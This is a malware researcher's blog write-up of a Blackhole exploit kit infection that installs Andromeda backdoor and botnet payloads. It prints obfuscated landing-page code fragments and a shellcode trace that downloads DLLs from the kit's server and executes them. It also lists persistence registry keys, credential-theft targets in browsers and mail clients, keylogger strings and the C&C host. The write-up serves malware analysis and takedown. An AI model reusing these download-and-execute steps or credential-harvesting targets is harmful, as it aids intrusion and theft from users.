A case of "Buggy Ransomware" with Backdoor, Spyware (is an Andromeda + Botnet CnC) Infection via Apache's Blackhole Exploit Kit
20 Jan 2013Background
I was contacted by a fellow researcher friend @StopMalvertisin to take a look into an infection of the double trojan downloading a Ransomware which MO of faking Java 7u11 written in the Stop Malvertising report here -->>[Link]. The report is well-explaining the native of the infection, so I guess what's left for me to do next is checking what's under the hood. I'll try to explain in a simple detail as possible. Please bear with my english, here we go:
#MalwareMustDie!!The infector
Following the hinted url, I tried to access it.. and was ending up like this:
Good, the moronz was really made me so "happy" so in some minutes I flushed them:
and also exposed the flushed payloads in twitter here:
(See↓ how the detection ratio was very low)#MalwareMustDie - Double infection 2 trojans via ONE shellcode by Blackhole virustotal.com/file/7486ac970… virustotal.com/file/4daec12c3… twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) January 19, 2013
If you follow our guide published in here -->>[GUIDE] and
our previous posts then you will have no problem w/getting same samples.
So let's see the log to learn why we failed in the first run.. :-)URL: h00p://digitalcurrencyreport.com/cybercrime-suspect-arrested200 w/bad response means you have to reach a "right" parameter/page, I don't think I made mistake with my params so is a matter of path/page.. After preparing bruter data for infector page names, tried the index pages 1st, and shortly hit the jackpot... was the server's root, LOL (lesson number one, better making sure if your target is still fresh !)
Resolving digitalcurrencyreport.com... seconds 0.00, 109.163.230.125
Caching digitalcurrencyreport.com => 109.163.230.125
Connecting to digitalcurrencyreport.com|109.163.230.125|:80... seconds 0.00, connected.
GET /cybercrime-suspect-arrested HTTP/1.0
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK "
Server: nginx admin
Date: Sat, 19 Jan 2013 06:57:46 GMT
Content-Type: text/html
Content-Length: 73
Connection: keep-alive
Last-Modified: Fri, 18 Jan 2013 04:23:17 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend "
:
200 OK (etc)GET / HTTP/1.0the code inside:
User-Agent: MalwareMustDie to Moronz: Thou salt not insult my beloved Mom!
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
: "
HTTP/1.1 200 OK
Server: nginx admin
Date: Sat, 19 Jan 2013 07:25:57 GMT
Content-Type: text/html
Content-Length: 990
Connection: keep-alive
Last-Modified: Wed, 16 Jan 2013 02:42:01 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend
200 OK
Length: 990 [text/html]
16:26:06 (28.16 MB/s) - `index.html' saved [990/990] ":So, hello landing page, let's play, 1st fetched it:
<title>ERROR: The requested URL could not be retrieved</title>
<meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
</head><body><iframe src='h00p://mongif・biz/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'></iframe>
<h1>ERROR</h1>Resolving mongif.biz... seconds 0.00, 46.166.169.179↑now we have Apache/2.2.3 (CentOS) + PHP/5.3.20 serving landing page.. What's the exploit kit? Snipped the landing page code with $ top:
Caching mongif.biz => 46.166.169.179
Connecting to mongif.biz|46.166.169.179|:80... seconds 0.00, connected.
GET /assumed/timing_borrows.php HTTP/1.0
User-Agent: MalwareMustDie to Moronz: Thou salt not insult a crusader!
Host: mongif.biz
HTTP request sent, awaiting response...
: "
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:33:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
Length: unspecified [text/html]
16:33:37 (98.14 KB/s) - `timing_borrows.php' saved [119372] "<html><head><title></title></head><body>Yes, friend, at this time I know is a blackhole. Shortly, I decoded it here -->>[PASTEBIN]To find the infection components are as per below download urls:
<applet code="hw" archive="/assumed/timing_borrows.php?ynafkyuv=tvmamz&vqew=fbu">
<param name="prime" value="" />
<param name="val" value="Dyy3Ojj0toA8.w?8UjViiK0eMjy808oAN?tllt_..
<div></div><script>function c(){if(window・document)s+=String.fromCharCode(a[i])..
<script>var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:!!6:6!:!23:!..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!:!!0:34:!25:44:!05:!!5..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:63:!!0:!0!:!!9:32:82:!0..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!09:!05:!!0:40:99:46:!08..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:4!:!23:!05:!02:40:47:9..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!!0:97:!!8:!05:!03:97:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!:!02:93:46:!00:!0!:!!5..
:// The JARs are here:↑NOTED, the path of this BHEK serve the infector. Below is the detection ratio of these exploit infectors in VT: Here --> [LandingPage] [JAR1] [JAR2] [PDF1] [PDF2] [SWF1] [SWF2](I wrote comment of WHICH exploit CVE used in each file in VT comment page) Most of these file exploit infectors are usually ones found in Blackhole EK, except one of the PDF infector is a bit special, it contains 4(four) CVE infector, actually I tweeted it here, see the VT comment for CVE code:
// Use the applet in landing page & fetched two jars:
URL: "h00p://mongif.biz/assumed/timing_borrows.php"
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:29:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 22568
ETag: e96e7e45516383c129d8bfabe0ce7a15
Last-Modified: Sat, 19 Jan 2013 07:29:23 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
16:29:32 (58.72 KB/s) - try1.jar saved [22568/22568]
:
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:31:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 16532
ETag: ea880b47daef50875ebe70c2fb427017
Last-Modified: Sat, 19 Jan 2013 07:31:56 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
Length: 16,532 (16K) [application/java-archive]
16:32:04 (50.54 KB/s) - try2.jar saved [16532/16532]
The PDFs are here: "
h00p://mongif.biz/assumed/timing_borrows.php?wkqavggu=30:1n:1i:1i:33&pqu=30:2v:3h&mblwxwdx=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ludkpgbm=1k:1d:1f:1d:1g:1d:1f
h00p://mongif.biz/assumed/timing_borrows.php?ggtmfzl=30:1n:1i:1i:33&lddsvzbu=3f&pznkfzh=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&wnq=1k:1d:1f:1d:1g:1d:1f"
The SWF are here: "
h00p://mongif.biz/assumed/timing_borrows.php?jdp=30:1n:1i:1i:33&chjlohkh=31:31:3c:3j:2v&npbua=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ublfosyz=xchadllm
h00p://mongif.biz/assumed/timing_borrows.php?nsxojsu=30:1n:1i:1i:33&uflnpv=34:30:3n:35&qtpzz=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&nyt=clxndipk"#MalwareMustDie - 4(four) CVE Exploits in a PDF to infect #RansomWare (w/double payloads). I explained in VT comment: virustotal.com/file/02a93d8be…
— Malware Crusaders (@MalwareMustDie) January 19, 2013Double Hit infection
So here's the point. I noticed the shellcode in landing page & in PDF is longer than usual. Landing page's (PluginDetect 0.7.9 used, at shellcode function): ↑Contains two urls of the payload download to be executed by the API below:0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 1You'll see the DOUBLE payload url in there↑ This shellcode is actually called & executed by SWF & JAR in post exploitation. The PDFs have their own way, in one PDF with 4 CVE exploiter we found below string: If you save it as binary and see it in ASCII then swap per 2 bits, in the end of the strings you'll see a double payload download url too: In another PDF you'll see the code below after you decoding its obfuscation: ↑the form of the two payload download urls in above picture is self explanatory :-)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x1a400000
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?ff=30:1n:1i:1i:33&se=1m:33:1n:30:1g:1o:1i:1l:2w:33&w=1k&xe=w&qj=v, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?nf=30:1n:1i:1i:33&qe=1l:31:1k:30:1g:1f:1i:1l:1f:1g&m=1k&hc=e&sf=z, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)Payloads
Payloads are in the Exploit Kit server as per URL mentioned API above. However, they made callbacks the CnC server in the different location. I won't write how I fetched the payloads, pls see previous posts/guide. But below is the download log as the evidence of this crime://first payload..Below is the detection ratio of these payloads in VT: [info.exe] [calc.exe]You'll see↑ how poor the detection ratio of these samples.
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:43:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:43:56 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private "
Content-Disposition: attachment; filename=’calc.exe’
Content-Transfer-Encoding: binary
Content-Length: 80384
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 80,384 (79K) [application/x-msdownload]
16:44:05 (93.77 KB/s) - `calc.exe' saved [80384/80384] "
// second payload..
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:44:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:44:36 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private "
Content-Disposition: attachment; filename=’info.exe’
Content-Transfer-Encoding: binary
Content-Length: 30208
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 30,208 (30K) [application/x-msdownload]
16:44:45 (129.68 KB/s) - `info.exe' saved [30208/30208] "What are these payloads?
Because is just too long, I can't go to details of my analysis for binaries. But I will write the infection flow step by step based on behavior analysis data of what these payloads do, with pictures, per sample. So you'll get the picture of what the payloads is actually do, better than a bunch of codes.. It wasn't an easy task (actually execution speed was so fast) so I did my best: info.exe info.exe is a malware classified by the name of Win32/Andromeda(aka Gamarue). A type of malware that is famous w/spyware, backdoor, stealer & downloader function. Andromeda botnet is one of popular crimeware, in this case Blackhole is used to distribute its trojan sets with the double infection. info.exe is in charge on backdoor function, while calc.exe is the botnet trojan. You'll find the good reference of these trojans here -->>[Ref]For Andromeda Botnet these are good 2 good references -->>[HERE]->>[HERE] Back to our case : This file will self copied itself into C:\Documents and Settings\All Users\ with the filename of svchost.exe, API used:PID: 3140 [PATH]\info.exe ADDR: 0x85017aDuring execution it also injects another process in memory: PoC, see the parent PID: The info.exe was opening TCP/IP 0.0.0.0 & listening to port 8000 as a daemon... At this time in the memory also detected the TCP traces:
CopyFileA(lpExistingFileName: "[PATH]\info.exe",
lpNewFileName: "C:\Documents and Settings\All Users\svchost.exe",
bFailIfExists: 0x0)00000001858F MSAFD Tcpip [TCP/IP]info.exe stays idle like that, below is the stacks info (see the idle part) In registry was recorded autorun + malicious setting of Internet Cache, please NOTED the faking of "Run\SunJavaUpdateSched" used↓
0000000011CE wshtcpip.pdb
000000018AE3 \Registry\Machine\System\CurrentControlSet\Services\Tcp\VParameters
000000018B2B \Registry\Machine\System\CurrentControlSet\Services\Tcp\Parameters
000000018B73 \Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
000000000C9A C:\WINDOWS\system32\wshtcpip.dll
00000002C093 MSAFD Tcpip [TCP/IP]
00000002C307 MSAFD Tcpip [UDP/IP]
00000002C57B MSAFD Tcpip [RAW/IP]
000000018A33 TcpipHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched: "C:\Documents and Settings\All Users\svchost.exe"In the memory I saw the strings related to the info.exe of above operation, With NOTED the Virtual machine detection + JavaUp(date) strings. Moreover the usage of crypto:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013012020130121\CachePath: "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013012020130121\"0x00D0E7 SOFTWARE\Microsoft\Cryptography\Defaults\Provider\And my TestPC user's variable sets are all loaded up too:
0x00D357 SOFTWARE\Microsoft\Cryptography\Providers\Type
0x00D387 SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type
0x00E047 SOFTWARE\Microsoft\Cryptography\Defaults\Provider
0x00E07F SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types0x02CEBD ALLUSERSPROFILE=C:\Documents and Settings\All UsersFor the sharing analysis purpose: More memory textual data of info.exe (Trojan/Andromeda) -->>[Download]The memory dump of Trojan/Andromeda info.exe is here-->>[PASTEBIN] calc.exe calc.exe is actually a botnet component of Andromeda trojan, this one does the communication to the CnC and download servers, I am sure this one is responsible for the download of other malwares like the Ransomware in StopMalwaretising case. Upon executed it also doing the self-copied with self-deleted:
0x02CF25 APPDATA=C:\Documents and Settings\%%USER\Application Data
0x02CF93 CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5 COMPUTERNAME=%USER%-1379CF37C25
0x02D02F ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077 FP_NO_HOST_CHECK=NO
0x02D09F HOMEDRIVE=C:
0x02D0B9 HOMEPATH=\Documents and Settings\%USER%
0x02D103 LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F NUMBER_OF_PROCESSORS=1
0x02D16D OS=Windows_NT
0x02D189 Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275 PROCESSOR_ARCHITECTURE=x86
0x02D2AB PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333 PROCESSOR_LEVEL=6
0x02D357 PROCESSOR_REVISION=0d06
0x02D387 ProgramFiles=C:\Program Files
0x02D3C3 SESSIONNAME=Console
0x02D3EB SystemDrive=C:
0x02D409 SystemRoot=C:\WINDOWS
0x02D435 TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF USERDOMAIN=%USER%-1379CF37C25
0x02D4F5 USERNAME=%USER%
0x02D50F USERPROFILE=C:\Documents and Settings\%USER%
0x02D563 windir=C:\WINDOWSPID: 3140 [PATH]\calc.exe ADDR: 0x87021bIn the same folder also detected the Identifier text file contains the defined HostID of my test machine: Upon execution, after self-copied, it also inject into another process: Which was executed from the new path: In registry was detected the below additional changes:
CopyFileA(lpExistingFileName: "[PATH]\calc.exe",
lpNewFileName: "%AppData%\igfx\igfxtray.exe",
bFailIfExists: 0x0)----------------------------------We also detecting the logs created by this malware, with the location and initial value below: Tried to brute XOR it, unsuccessful... Even tried to translate it in many lang/encoding, still meaningless.. If anyone can help to figure what it is, here's the FULL log file-->>[Download]In the memory I found the similar encrypted string pattern too:
Keys added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\6
----------------------------------
Values added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}\StubPath: ""C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\igfxtray: "C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe: "Pagent Show"
----------------------------------
Values deleted:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\14: 30 00 31 00 30 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 31 30 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 31 00 30 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
----------------------------------
Values modified:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 1E 00 00 00 E0 FD F4 9E 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 20 00 00 00 00 65 59 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 3F 00 00 00 20 49 41 9F 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 41 00 00 00 D0 E8 6E 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 01 00 00 00 06 00 00 00 60 85 99 AA 71 A4 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 02 00 00 00 07 00 00 00 C0 38 E9 E7 6A F6 CD 010x02D1B1 s}X_a}Tb\}
0x02D1D5 s}X_a}
0x02D1F9 s}X_a}
0x02D22D s}X_a}Lc\}
0x02D241 s}X_a}
0x02D255 s}X_a}pb\}
0x02D291 s}X_a}
0x02D2A9 a}X_a}
0x02D2B7 X_a}8c\}
0x02D2F1 s}X_a}
0x02D33D s}X_a}
0x02D387 Service Pack 3
0x02D4A0 ka}/ka}?ka}Oka}_ka}oka}
0x02D4EC pa}-pa}=pa}Mpa}]pa}mpa}}pa}
0x02D528 qa}"qa}3qa}Dqa}Uqa}fqa}wqa}
0x02D564 ra}!ra}2ra}Cra}Tra}era}vra}
0x02D5A0 sa} sa}1sa}Bsa}Ssa}dsa}usa}
0x02D5E0 ta}0ta}Ata}Rta}cta}tta}
0x02D608 ta}k_a}
0x02D618 ua}cva}}va}U
0x02D628 va}!wa};wa}
0x02D648 xa}4xa}Hxa}\xa}sxa}CnC and Credentials..
So now we know the CnC of this payload & how it supposed to communicate:CnC: wordpress.serveblog.net:3360 IP: 46.253.180.35 Methods: FCONNECT %s:%d HTTP/1.0 http://%s%s GET %s HTTP/1.1 Host: %s Connection: closeIf we see the reverse result in memory of igfxtray.exe these data will be seen: In igfxtray.exe I found the trace of sqlite commony used by Andromeda Botnet:sqlite3.dllLet's be sure by capturing the traffic, below is the pic of take-1 PCAP: With the packet data as per HEX below: I share the PCAP capture data below [PCAP1] [PCAP2] [PCAP3][ADDITIONAL]Other researcher was kindly to contribute his PCAP Traffic Data which proofing the communication between infected PC to the host: ugctrust.com and requesting POST command to ugctrust.com/image.php, as per below capture snapshot of the traffic related in details: The PCAP data is here --->>[PCAP]Thank's to @Userbased in kernelmode for the support. Now we have clear evidence that related this malware to ugctrust.com that backing up the verdict of REVETON download caused by this set of trojans. Furthermore in the memory was detected many OTHER stuff.. The below browser's path:
mozsqlite3.dll
%s\signons.sqlite
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text%s\Mozilla\Firefox\profiles.iniAnd the location of our passwords/credentials
%s\Mozilla\Firefox\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\%s
%s\Opera\Opera\wand.dat
%s\Opera\Opera\profile\wand.datWindowsLive:name=*Just like the info.exe, my PC data also loaded & spotted:
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
POP3 User
POP3 Server
POP3 Password
IMAP User
IMAP Server
IMAP Password
HTTP User
HTTP Server
HTTP Password
SMTP User
SMTP Server
SMTP Password
%c%c%S
abe2869f-9b47-4cd9-a358-c22904dba7f7
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
index.dat
History
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\Google\Chrome\User Data\Default\Login Data
%s\Chromium\User Data\Default\Login Data
localhost
USERNAME0x02CEBD ALLUSERSPROFILE=C:\Documents and Settings\All UsersI think this is how they format the log:
0x02CF25 APPDATA=C:\Documents and Settings\%USER%\Application Data
0x02CF93 CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5 COMPUTERNAME=%USER%-1379CF37C25
0x02D02F ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077 FP_NO_HOST_CHECK=NO
0x02D09F HOMEDRIVE=C:
0x02D0B9 HOMEPATH=\Documents and Settings\%USER%
0x02D103 LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F NUMBER_OF_PROCESSORS=1
0x02D16D OS=Windows_NT
0x02D189 Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275 PROCESSOR_ARCHITECTURE=x86
0x02D2AB PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333 PROCESSOR_LEVEL=6
0x02D357 PROCESSOR_REVISION=0d06
0x02D387 ProgramFiles=C:\Program Files
0x02D3C3 SESSIONNAME=Console
0x02D3EB SystemDrive=C:
0x02D409 SystemRoot=C:\WINDOWS
0x02D435 TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF USERDOMAIN=%USER%-1379CF37C25
0x02D4F5 USERNAME=%USER%
0x02D50F USERPROFILE=C:\Documents and Settings\%USER%%s.IdentifierYou can call me "paranoia" but these key's data is there...
%Rand%
%d:0:0:%s\%s;
%d:%I64u:0:%s\%s;
%c%I64u
%llu
%s%.2d-%.2d-%.4d
[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d][Backspace]The rest of the memory data in text is here -->>[Download]I captured the memory dump of igfxtray.exe here -->>[Download] What happened after we restart the PC? It just won't start, my MBR must have been changed.. A buggy Andromeda infection with Ransomware?? :-( Sadly I did not see any traffic to/from ugctrust.com nor a ransomware download.. Anyway the Botnet and Blackhole EK used is still up and running, who knows what they will infect us with next, let's shut this "badest" bad" actor down!
[Enter]
[Tab]
[Arrow Left]
[Arrow Up]
[Arrow Right]
[Arrow Down]
[Home]
[Page Up]
[Page Down]
[End]
[Break]
[Delete]
[Insert]
[Print Screen]
[Scroll Lock]
[Caps Lock]
[Alt]
[Esc]
[Ctrl+%c]Network Infection Analysis (Evidence of Crime of mongif.biz)
The Blackhole malware infector IP hosted by domain mongif.biz was confirmedto be registered & used for malware infection purpose only, and curently still distributing Ransomware Malware actively.The other reports shows incident reported-->>[HERE] Below is the infector domains/registration info for the SHUTDOWN purpose, I marked the ID for responsible contact. For the fellow admins, please block this IP address: 46.166.169.179//Hosts related to the infection verdict:
"mongif.biz A 46.166.169.179
www.mongif.biz A 46.166.169.179"
//SOA record
mongif.biz
primary name server = mongif.biz
responsible mail addr = "kaizendass.gmail.com"
serial = 1358061503 ^^^^^^^^^^^^^^^^^^^^^
refresh = 10800 (3 hours)
retry = 3600 (1 hour)
expire = 604800 (7 days)
"default TTL = 38400 (10 hours 40 mins)"
//Name servers:
ns3.mongif.biz A 46.166.169.179
ns4.mongif.biz A 46.166.169.182
//INTERNET IDC:
Segment: 46.166.169.0/24
ASN: AS57668 / SANTREX-AS
//Domain Registration (ID: PP-SP-001)
Domain Name: MONGIF.BIZ
"Domain ID: D52783523-BIZ"
"Registrant ID: PP-SP-001"
^^^^^^^^^^^^^^^^^
Created by Registrar: DOMAINCONTEXT, INC.
Sponsoring Registrar: DOMAINCONTEXT, INC.
Sponsoring Registrar IANA ID:1111
Last Updated by Registrar: DOMAINCONTEXT, INC.
Domain Registration Date: Thu Jan 10 17:08:56 GMT 2013
Domain Expiration Date: Thu Jan 09 23:59:59 GMT 2014
"Domain Last Updated Date: Sun Jan 13 08:06:57 GMT 2013"
^^^^^^^^^^^^^^^^^^^^Sample
For research + raising detection ratio purpose. Here's the samples -->>[MEDIAFIRE]The moral of the story
Never ever insult any mother, that's just a way out of line, you'll have a BAD time & be cursed as a lifetime internet jerks like these moronz for sure..